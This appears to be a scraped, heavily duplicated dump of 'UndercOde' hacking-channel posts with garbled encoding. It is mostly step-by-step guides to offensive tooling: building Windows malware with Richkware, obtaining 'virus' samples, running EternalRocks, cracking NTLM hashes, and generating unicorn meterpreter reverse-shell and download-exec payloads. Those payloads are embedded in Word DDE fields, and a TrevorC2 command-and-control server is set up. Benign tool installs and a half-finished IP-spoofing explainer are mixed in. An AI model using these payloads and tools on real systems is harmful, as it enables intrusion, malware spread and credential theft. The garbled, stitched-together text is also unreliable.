โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ EternalRocks worm(virus ) BREAKED WINDOWS HACK TOOL
> MicroBotMassiveNet
instagram.com/UndercOdeTestingCompany
> It spreads through public (The Shadow Brokers NSA dump) SMB exploits: ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE and ETERNALSYNERGY, along with related programs: DOUBLEPULSAR, ARCHITOUCH and SMBTOUCH.
ยป taskhost.exe properties
> First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C ( ubgdgno5eswkhmpy. onion) communication requesting further instructions (e.g. installation of new components).
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) Downloading required .NET components (first stage)
> http://api.nuget.org/packages/taskscheduler.2.5.23.nupkg
> http://api.nuget.org/packages/sharpziplib.0.86.0.nupkg # in newer variants
2) Appendix
> Decompilation of an older sample
C# source # 1ee894c0b91f3b2f836288c22ebeab44798f222f17c255f557af2260b8c6a32d
3) Globals
> Network traffic capture (PCAP)
4) Windows 7 x64 SP1 Honeypot # initial exploitation capture ]
5) Yara rules
> EternalRocks.yara
๐ฆ Debug strings
> C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
> C:\Users\tmc\Documents\DownLoader\Project1.vbp
> C:\Users\tmc\Documents\TorUnzip\Project1.vbp
> c:\Users\tmc\Documents\Visual Studio 2015\Projects\MicroBotMassiveNet\taskhost\obj\x86\Debug\taskhost.pdb
> C:\Users\tmc\Documents\Visual Studio 2015\Projects\WindowsServices\svchost\bin\svchost.pdb
6) Now Download .zip file
> https://github.com/stamparm/EternalRocks/archive/master.zip
๐ฆFile paths
> c:\Program Files\Microsoft Updates\
> Scheduled tasks
> ServiceHost -> C:\Program Files\Microsoft Updates\svchost.exe # system start, log on, daily
> TaskHost -> C:\Program Files\Microsoft Updates\taskhost.exe # system start, log on, daily
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ EternalRocks worm(virus ) BREAKED WINDOWS HACK TOOL
> MicroBotMassiveNet
instagram.com/UndercOdeTestingCompany
> It spreads through public (The Shadow Brokers NSA dump) SMB exploits: ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE and ETERNALSYNERGY, along with related programs: DOUBLEPULSAR, ARCHITOUCH and SMBTOUCH.
ยป taskhost.exe properties
> First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C ( ubgdgno5eswkhmpy. onion) communication requesting further instructions (e.g. installation of new components).
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) Downloading required .NET components (first stage)
> http://api.nuget.org/packages/taskscheduler.2.5.23.nupkg
> http://api.nuget.org/packages/sharpziplib.0.86.0.nupkg # in newer variants
2) Appendix
> Decompilation of an older sample
C# source # 1ee894c0b91f3b2f836288c22ebeab44798f222f17c255f557af2260b8c6a32d
3) Globals
> Network traffic capture (PCAP)
4) Windows 7 x64 SP1 Honeypot # initial exploitation capture ]
5) Yara rules
> EternalRocks.yara
๐ฆ Debug strings
> C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
> C:\Users\tmc\Documents\DownLoader\Project1.vbp
> C:\Users\tmc\Documents\TorUnzip\Project1.vbp
> c:\Users\tmc\Documents\Visual Studio 2015\Projects\MicroBotMassiveNet\taskhost\obj\x86\Debug\taskhost.pdb
> C:\Users\tmc\Documents\Visual Studio 2015\Projects\WindowsServices\svchost\bin\svchost.pdb
6) Now Download .zip file
> https://github.com/stamparm/EternalRocks/archive/master.zip
๐ฆFile paths
> c:\Program Files\Microsoft Updates\
> Scheduled tasks
> ServiceHost -> C:\Program Files\Microsoft Updates\svchost.exe # system start, log on, daily
> TaskHost -> C:\Program Files\Microsoft Updates\taskhost.exe # system start, log on, daily
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Framework for building Windows malware written in C++ 2019 new release //
> Virus/ Worms /Bot / Spyware/ Keylogger/ Scareware
>Richkware is a library of network and OS functions, that you can use to create malware. The composition of these functions permits the application to assume behaviors referable to the following types of malware
t.me/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/richkmeli/Richkware
2) cd Richware
3) Open main.cpp, and create an instance of Richkware.
4) With Richkware-Manager-Server
If you have deployed RMS, you can initialize the malware as follows:
int main() {
Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
...
return 0;
}
5) Otherwise, if you haven't deployed RMS, you can use:
Richkware richkware("Richk","richktest");
in this way, it uses "richktest" as encryption key.
> ( Using MinGW for Windows or MinGW cross compiler for Linux build environment
make)
6) Compiling :
Using Microsoft C++ compiler (Visual Studio)
> C/C++ > Preprocessor > Preprocessor Definitions, add
> "_CRT_SECURE_NO_WARNINGS"
Linker > Input > Additional Dependencies, add "Ws2_32.lib"
7) Remotely Command Execution
Call framework function StartServer in the main, it starts server on a port, in the following example is the TCP port 8000. Remember that if a port is already used by another program, you can't use that port, until the program will be stopped.
int main () {
...
richkware.network.server.Start("8000");
...
}
8)Connect using terminal in Unix systems
In Unix systems, you can use netcat, and run the following command:
nc <serverName> 8000
9) Connect using terminal in Windows
In Windows, you can use telnet, in the same way:
> telnet <serverName> 8000
๐ฆE N J O Y
WRITTEN BY Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Framework for building Windows malware written in C++ 2019 new release //
> Virus/ Worms /Bot / Spyware/ Keylogger/ Scareware
>Richkware is a library of network and OS functions, that you can use to create malware. The composition of these functions permits the application to assume behaviors referable to the following types of malware
t.me/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/richkmeli/Richkware
2) cd Richware
3) Open main.cpp, and create an instance of Richkware.
4) With Richkware-Manager-Server
If you have deployed RMS, you can initialize the malware as follows:
int main() {
Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
...
return 0;
}
5) Otherwise, if you haven't deployed RMS, you can use:
Richkware richkware("Richk","richktest");
in this way, it uses "richktest" as encryption key.
> ( Using MinGW for Windows or MinGW cross compiler for Linux build environment
make)
6) Compiling :
Using Microsoft C++ compiler (Visual Studio)
> C/C++ > Preprocessor > Preprocessor Definitions, add
> "_CRT_SECURE_NO_WARNINGS"
Linker > Input > Additional Dependencies, add "Ws2_32.lib"
7) Remotely Command Execution
Call framework function StartServer in the main, it starts server on a port, in the following example is the TCP port 8000. Remember that if a port is already used by another program, you can't use that port, until the program will be stopped.
int main () {
...
richkware.network.server.Start("8000");
...
}
8)Connect using terminal in Unix systems
In Unix systems, you can use netcat, and run the following command:
nc <serverName> 8000
9) Connect using terminal in Windows
In Windows, you can use telnet, in the same way:
> telnet <serverName> 8000
๐ฆE N J O Y
WRITTEN BY Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - richkmeli/Richkware: Framework for building Windows malware, written in C++
Framework for building Windows malware, written in C++ - richkmeli/Richkware
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Install ADB & FastBoot Tools in Termux!
2019
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
A) Silent installation:
1) Copy and paste the following command in Termux to silently install Tools:
> apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null
2) wget https://github.com/MasterDevX/Termux-ADB/raw/master/
3) InstallTools.sh -q && bash InstallTools.sh
B) Common installation:
1) Copy and paste the following command in Termux to install Tools with logs output:
> apt update && apt install wget && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh && bash InstallTools.sh
๐ฆTested
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Install ADB & FastBoot Tools in Termux!
2019
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
A) Silent installation:
1) Copy and paste the following command in Termux to silently install Tools:
> apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null
2) wget https://github.com/MasterDevX/Termux-ADB/raw/master/
3) InstallTools.sh -q && bash InstallTools.sh
B) Common installation:
1) Copy and paste the following command in Termux to install Tools with logs output:
> apt update && apt install wget && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh && bash InstallTools.sh
๐ฆTested
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow To Compress / Decompress Brawl Stars SC files on Windows / Linux / Android!
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
> On Windows:
1) Download Python 3.5 or newer version from official page.
>https://www.python.org/downloads/
2) Install Python. While Installing, enable such parameters as "Add Python to PATH", "Install pip", "Install py launcher", "Associate files with Python" and "Add Python to environment variables".
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) Execute "Init.py" file to install required modules and create workspace directories.
๐ฆOn Linux:
1) Open Terminal and install Python by executing following command:
2) sudo apt-get update && sudo apt-get install python3 python3-pip
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) Execute "Init.py" file to install required modules and create workspace directories.
๐ฆ On Android:
1) Download and install PyDroid app from Google Play.
> https://play.google.com/store/apps/details?id=ru.iiec.pydroid3
2) Open PyDroid and wait until Python installs.
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) In PyDroid open and execute "Init.py" file to install required modules and create workspace directories.
๐ฆ How to use
> To compile SC:
1) Put folders with texture name and .png files inside them in the "In-Decompressed-SC" directory and execute "SC-Encode.py" script. After the process will be finished, your .sc files will appear in "Out-Compressed-SC" folder.
2) To decompile SC:
> Put .sc files in the "In-Compressed-SC" directory and execute "SC-Decode.py" script. After the process will be finished, your .png files will appear in "Out-Decompressed-SC" folder.
๐ฆTested By undercOde
> win server essentiel
> android 8.0
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow To Compress / Decompress Brawl Stars SC files on Windows / Linux / Android!
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
> On Windows:
1) Download Python 3.5 or newer version from official page.
>https://www.python.org/downloads/
2) Install Python. While Installing, enable such parameters as "Add Python to PATH", "Install pip", "Install py launcher", "Associate files with Python" and "Add Python to environment variables".
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) Execute "Init.py" file to install required modules and create workspace directories.
๐ฆOn Linux:
1) Open Terminal and install Python by executing following command:
2) sudo apt-get update && sudo apt-get install python3 python3-pip
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) Execute "Init.py" file to install required modules and create workspace directories.
๐ฆ On Android:
1) Download and install PyDroid app from Google Play.
> https://play.google.com/store/apps/details?id=ru.iiec.pydroid3
2) Open PyDroid and wait until Python installs.
3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) In PyDroid open and execute "Init.py" file to install required modules and create workspace directories.
๐ฆ How to use
> To compile SC:
1) Put folders with texture name and .png files inside them in the "In-Decompressed-SC" directory and execute "SC-Encode.py" script. After the process will be finished, your .sc files will appear in "Out-Compressed-SC" folder.
2) To decompile SC:
> Put .sc files in the "In-Compressed-SC" directory and execute "SC-Decode.py" script. After the process will be finished, your .png files will appear in "Out-Decompressed-SC" folder.
๐ฆTested By undercOde
> win server essentiel
> android 8.0
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ WIN32/SIREFEF VIRUS i just to test now this Virus & his effect on windows in UndercOde i declare:
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including:
1) Downloading and running other files
2) Contacting remote hosts
3) Disabling security features
4) Members of the family can also change search results, which can generate money for the hackers who use Sirefef.
> Variants of Win32/Sirefef might be installed by other malware, including variants of the Trojan:Win32/Necurs family.
5) This kind on Virus dangerous can t be removed easly
> in addiction anti-virus apps detect and remove whole file
can t be remove from those files by anti-virus apps
Written by Steaven
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ WIN32/SIREFEF VIRUS i just to test now this Virus & his effect on windows in UndercOde i declare:
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including:
1) Downloading and running other files
2) Contacting remote hosts
3) Disabling security features
4) Members of the family can also change search results, which can generate money for the hackers who use Sirefef.
> Variants of Win32/Sirefef might be installed by other malware, including variants of the Trojan:Win32/Necurs family.
5) This kind on Virus dangerous can t be removed easly
> in addiction anti-virus apps detect and remove whole file
can t be remove from those files by anti-virus apps
Written by Steaven
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Create Virus on Termux/Linux Without root - simple example
instagram.com/UndercodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) apt update && apt upgrade
2) apt install git
3) apt install python && apt install python2
4) git clone https://github.com/TheReaper167/Malicious
5) cd Malicious
6) pip2 install -r requirements.txt
7) pip2 install requests
8) python2 malicious.py
9) after download virus open your file explorer
10) p find folder Malicious and open it
11) chose and open folder Android if you download virus Android
Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Create Virus on Termux/Linux Without root - simple example
instagram.com/UndercodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) apt update && apt upgrade
2) apt install git
3) apt install python && apt install python2
4) git clone https://github.com/TheReaper167/Malicious
5) cd Malicious
6) pip2 install -r requirements.txt
7) pip2 install requests
8) python2 malicious.py
9) after download virus open your file explorer
10) p find folder Malicious and open it
11) chose and open folder Android if you download virus Android
Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAutomate Cracking
For Linux & root termux
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) mkdir -p hashcat/deps
2) git clone https://github.com/KhronosGroup/OpenCL-Headers.git
3) hashcat/deps/OpenCL
4) cd hashcat/
5) make
6) make install
7) python wordlist_optimizer.py <input file list> <output directory>
8) python wordlist_optimizer.py wordlists.txt ../optimized_wordlists
9) hashcat --help |grep -i ntlm
5500 | NetNTLMv1 | Network protocols
5500 | NetNTLMv1 + ESS | Network protocols
5600 | NetNTLMv2 | Network protocols
1000 | NTLM | Operating-Systems
๐ฆFeatures :
(1) Quick Crack
(2) Extensive Pure_Hate Methodology Crack
(3) Brute Force Attack
(4) Top Mask Attack
(5) Fingerprint Attack
(6) Combinator Attack
(7) Hybrid Attack
(8) Pathwell Top 100 Mask Brute Force Crack
(9) PRINCE Attack
(10) YOLO Combinator Attack
(11) Middle Combinator Attack
(12) Thorough Combinator Attack
๐ฆTested by UndercOde On:
> Ubanto
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAutomate Cracking
For Linux & root termux
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) mkdir -p hashcat/deps
2) git clone https://github.com/KhronosGroup/OpenCL-Headers.git
3) hashcat/deps/OpenCL
4) cd hashcat/
5) make
6) make install
7) python wordlist_optimizer.py <input file list> <output directory>
8) python wordlist_optimizer.py wordlists.txt ../optimized_wordlists
9) hashcat --help |grep -i ntlm
5500 | NetNTLMv1 | Network protocols
5500 | NetNTLMv1 + ESS | Network protocols
5600 | NetNTLMv2 | Network protocols
1000 | NTLM | Operating-Systems
๐ฆFeatures :
(1) Quick Crack
(2) Extensive Pure_Hate Methodology Crack
(3) Brute Force Attack
(4) Top Mask Attack
(5) Fingerprint Attack
(6) Combinator Attack
(7) Hybrid Attack
(8) Pathwell Top 100 Mask Brute Force Crack
(9) PRINCE Attack
(10) YOLO Combinator Attack
(11) Middle Combinator Attack
(12) Thorough Combinator Attack
๐ฆTested by UndercOde On:
> Ubanto
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ New release 2019 in tool for using a PowerShell downgrade attack and inject shellcode straight into memory
> you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack
> use for learning only
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/trustedsec/unicorn
2) cd unicorn
3) python unicorn.py
4) Commands :
> python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
> PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
> Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
> Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
> Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
> HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
> HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
> HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
> DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
>CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
>Custom PS1 Example: python unicorn.py <path to ps1 file>
> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
> Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
>Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
๐ฆ to apply the payload :
1) Open Word
2) Insert tab -> Quick Parts -> Field
3) Choose = (Formula) and click ok.
4) Once the field is inserted, you should now see "!Unexpected End of Formula"
5) Right-click the Field, choose "Toggle Field Codes"
6) Paste in the code from Unicorn
7) Save the Word document.
E N J O Y
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ New release 2019 in tool for using a PowerShell downgrade attack and inject shellcode straight into memory
> you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack
> use for learning only
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/trustedsec/unicorn
2) cd unicorn
3) python unicorn.py
4) Commands :
> python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
> PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
> Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
> Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
> Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
> HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
> HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
> HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
> DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
>CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
>Custom PS1 Example: python unicorn.py <path to ps1 file>
> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
> Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
>Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
๐ฆ to apply the payload :
1) Open Word
2) Insert tab -> Quick Parts -> Field
3) Choose = (Formula) and click ok.
4) Once the field is inserted, you should now see "!Unexpected End of Formula"
5) Right-click the Field, choose "Toggle Field Codes"
6) Paste in the code from Unicorn
7) Save the Word document.
E N J O Y
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTrevorC2 - Command and Control via Legitimate Behavior over HTTP
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/trustedsec/trevorc2
2) cd trevorc2
3) pip install -r requirements.txt
4) trevor2_server.py
> to edit the file first, and customize, what website you want to clone, etc. The server will clone a website of your choosing and stand up a server. This server is browsable by anyone and looks like a legitimate website. Contained within the source is parameter that (again is configurable), which contains the instructions for the client. Once a client connects, it searches for that parameter, then uses it to execute commands.
5) trevor2_client.py
> all you need in any configurable option is the ability to call out to a website, parse some basic data, and then execute a command and then put the results in a base64 encoded query string parameter to the site. That's it, not hard.
6) trevor2_client.ps1
> powershell implementation of trevor2_client.py, this allows you to use native PowerShell to interact with Trevor2_Server.
๐ฆDockerfile:
1) git clone https://github.com/trustedsec/trevorc2.git
2) cd trevorc2
# At this point, setting up docker-machine to remotly deploy works great
3) docker build -t trevorc2 .
4) docker run -it -p 80:80 -p 443:443 trevorc2
USE FOR LEARN ONLY
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTrevorC2 - Command and Control via Legitimate Behavior over HTTP
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/trustedsec/trevorc2
2) cd trevorc2
3) pip install -r requirements.txt
4) trevor2_server.py
> to edit the file first, and customize, what website you want to clone, etc. The server will clone a website of your choosing and stand up a server. This server is browsable by anyone and looks like a legitimate website. Contained within the source is parameter that (again is configurable), which contains the instructions for the client. Once a client connects, it searches for that parameter, then uses it to execute commands.
5) trevor2_client.py
> all you need in any configurable option is the ability to call out to a website, parse some basic data, and then execute a command and then put the results in a base64 encoded query string parameter to the site. That's it, not hard.
6) trevor2_client.ps1
> powershell implementation of trevor2_client.py, this allows you to use native PowerShell to interact with Trevor2_Server.
๐ฆDockerfile:
1) git clone https://github.com/trustedsec/trevorc2.git
2) cd trevorc2
# At this point, setting up docker-machine to remotly deploy works great
3) docker build -t trevorc2 .
4) docker run -it -p 80:80 -p 443:443 trevorc2
USE FOR LEARN ONLY
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTest WPA3 using virtual Wi-Fi interfaces
t.me/undercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/vanhoefm/hostap-wpa3
2) cd hostapd-wpa3
3) cp defconfig .config
4) make -j 2
5) cd ..
6) now for wpa_supplicant:
> cd wpa_supplicant
7) cp defconfig .config
8) make -j 2
9) sudo modprobe mac80211_hwsim radios=3
> rfkill unblock wifi
`10) Optionally kill other Wi-Fi clients the brute-for way:
> sudo pkill wpa_supplicant
11) Open a new terminal, and in the directory hostapd execute:
> sudo ./hostapd hostapd_wpa3.conf -dd -K
12) Open another terminal, and in the directory wpa_supplicant execute:
> sudo ./wpa_supplicant -D nl80211 -i wlan1 -c supp_wpa3.conf -dd -K
Written by Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTest WPA3 using virtual Wi-Fi interfaces
t.me/undercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/vanhoefm/hostap-wpa3
2) cd hostapd-wpa3
3) cp defconfig .config
4) make -j 2
5) cd ..
6) now for wpa_supplicant:
> cd wpa_supplicant
7) cp defconfig .config
8) make -j 2
9) sudo modprobe mac80211_hwsim radios=3
> rfkill unblock wifi
`10) Optionally kill other Wi-Fi clients the brute-for way:
> sudo pkill wpa_supplicant
11) Open a new terminal, and in the directory hostapd execute:
> sudo ./hostapd hostapd_wpa3.conf -dd -K
12) Open another terminal, and in the directory wpa_supplicant execute:
> sudo ./wpa_supplicant -D nl80211 -i wlan1 -c supp_wpa3.conf -dd -K
Written by Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆIP Spoofing FULL :
The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.
T.me/UnderCodeTestingOfficial
๐ฆWhy it works ?
IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is security weakness in the TCP protocol known as sequence number prediction.
๐ฆHow it works ?
To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.
๐ฆInternet Protocol (IP) :
It is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.
